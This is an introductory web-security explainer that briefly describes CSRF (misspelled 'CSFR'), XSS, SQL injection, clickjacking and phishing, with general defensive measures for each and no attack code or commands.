Users are highly reliant upon browsing where their private information is kept safe and confidential. This information might include usernames, passwords or credit card details, etc. However, every website on the internet is vulnerable to web-based attacks to some extent. Web attacks might include theft of information, manipulating the user, or injecting a malicious payload. Web attacks can either be on the browser side or the server-side.
The illustration below shows some of the most common web attacks:
The CSFR Attack takes advantage of the following factors to cause the user to take an unintentional action:
Cause the user to access a link.
The attacker will leverage that the user has already been authenticated.
An attacker can carry out a CSFR attack through cookie-based session handling or manipulating HTTP headers.
Few defenses and preventive measures against CSFR attack include the following:
Use CSFR tokens with HTTP headers.
Use distinct URLs with randomized components.
Require authentication more frequently.
In the XSS attack, the attackers target the users instead of the website. The attacker inserts a malicious code/payload, which the website’s user then executes. XSS belongs to two categories:
Reflected XSS: the malicious script reflects off of a web application to the user’s browser.
Stored XSS: the malicious script is injected into the website directly. It is more damaging than the reflective XSS attack.
The most common defenses against XSS attacks are as follows:
Use white-listing. This will ensure that all the cookies, headers, and hidden fields validate against a list of allowed specifications.
Render the untrusted HTML data safely by following XSS prevention manuals found online.
In an SQL Injection attack, the attacker manipulates the SQL queries to change/delete/update information in the database.
The most common defense against SQL Injection attacks is to use Prepared statements in the code. Hence, the query structure is defined independently of what the attacker will input.
The impersonation attacks mislead the user into believing something which appears to be different from its truth. There are two categories of impersonation attacks as follows:
Clickjacking: misleading users regarding where they click. For example, a user unknowingly might click some hidden advertisements.
Phishing: misleading users regarding whom they are interacting.
Some defenses against clickjacking and phishing attacks include:
Require confirmation from users regarding their actions on the web.
Implement frame-busting, which prevents hidden/invisible pages or advertisements within web pages.
Delete suspicious emails and protect your personal information to prevent phishing attacks.
Free Resources